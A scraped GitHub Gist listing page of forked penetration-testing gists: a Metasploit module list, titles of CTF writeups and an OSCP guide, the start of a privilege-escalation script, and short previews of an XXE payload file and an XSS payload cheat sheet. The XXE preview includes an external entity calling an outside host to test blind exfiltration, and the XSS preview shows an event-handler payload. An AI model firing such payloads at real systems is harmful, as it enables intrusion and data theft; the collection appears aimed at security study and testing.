The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/LazySysAdmin-VulnHub.html
A fun box from Vulnhub, written by Togie McDogie. You can find it here at https://www.vulnhub.com/entry/lazysysadmin-1,205/
FB fb11
fb11
/ 2017_mstasploit
Created
March 7, 2018 14:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| auxiliary/admin/http/cnpilot_r_cmd_exec normal Cambium cnPilot r200/r201 Command Execution as 'root' | |
| auxiliary/admin/http/cnpilot_r_fpt normal Cambium cnPilot r200/r201 File Path Traversal | |
| auxiliary/admin/http/mantisbt_password_reset 2017-04-16 normal MantisBT password reset | |
| auxiliary/admin/http/pfadmin_set_protected_alias 2017-02-03 normal Postfixadmin Protected Alias Deletion Vulnerability | |
| auxiliary/admin/http/ulterius_file_download normal Ulterius Server File Download Vulnerability | |
| auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution | |
| auxiliary/dos/cisco/ios_telnet_rocem 2017-03-17 normal Cisco IOS Telnet Denial of Service | |
| auxiliary/dos/ht |
fb11
/ CTFWRITE-LazySysAdmin@VulnHub.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-LazySysAdmin@VulnHub.md
CTF Writeup: LazySysadmin @ VulnHub
fb11
/ CTFWRITE-ZorZ@Vulnhub.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-ZorZ@Vulnhub.md
A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/ZorZ-Vulnhub.html
This is "CTF" is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.
The VulnHub description says:
fb11
/ CTFWRITE-Europa-HTB.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-Europa-HTB.md
CTF Writeup: Europa on HackTheBox
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Europa-HTB.html
fb11
/ CTFWRITE-Blocky-HTB.md
Created
March 3, 2018 22:52
— forked from berzerk0/CTFWRITE-Blocky-HTB.md
CTF Writeup: Blocky on HackTheBox
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Blocky-HTB.html
fb11
/ how-to-oscp-final.md
Created
February 26, 2018 16:18
— forked from unfo/how-to-oscp-final.md
fb11
/ enum.sh
Created
February 26, 2018 16:06
— forked from unfo/enum.sh
Linux priv esc. Might be out-dated script versions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| BLACK="\033[30m" | |
| RED="\033[31m" | |
| GREEN="\033[32m" | |
| YELLOW="\033[33m" | |
| BLUE="\033[34m" | |
| PINK="\033[35m" | |
| CYAN="\033[36m" | |
| WHITE="\033[37m" |
fb11
/ XXE_payloads
Created
November 6, 2017 11:49
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Uzaktan Kod caistirma Basarili |
fb11
/ brutelogic.md
Created
October 16, 2017 17:36
— forked from toufik-airane/brutelogic.md
Credit: @brutelogic (blog)
The XSS payloads and schemes used in all posts for a quick reference.
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
<brute contenteditable onblur=alert(1)>lose focus!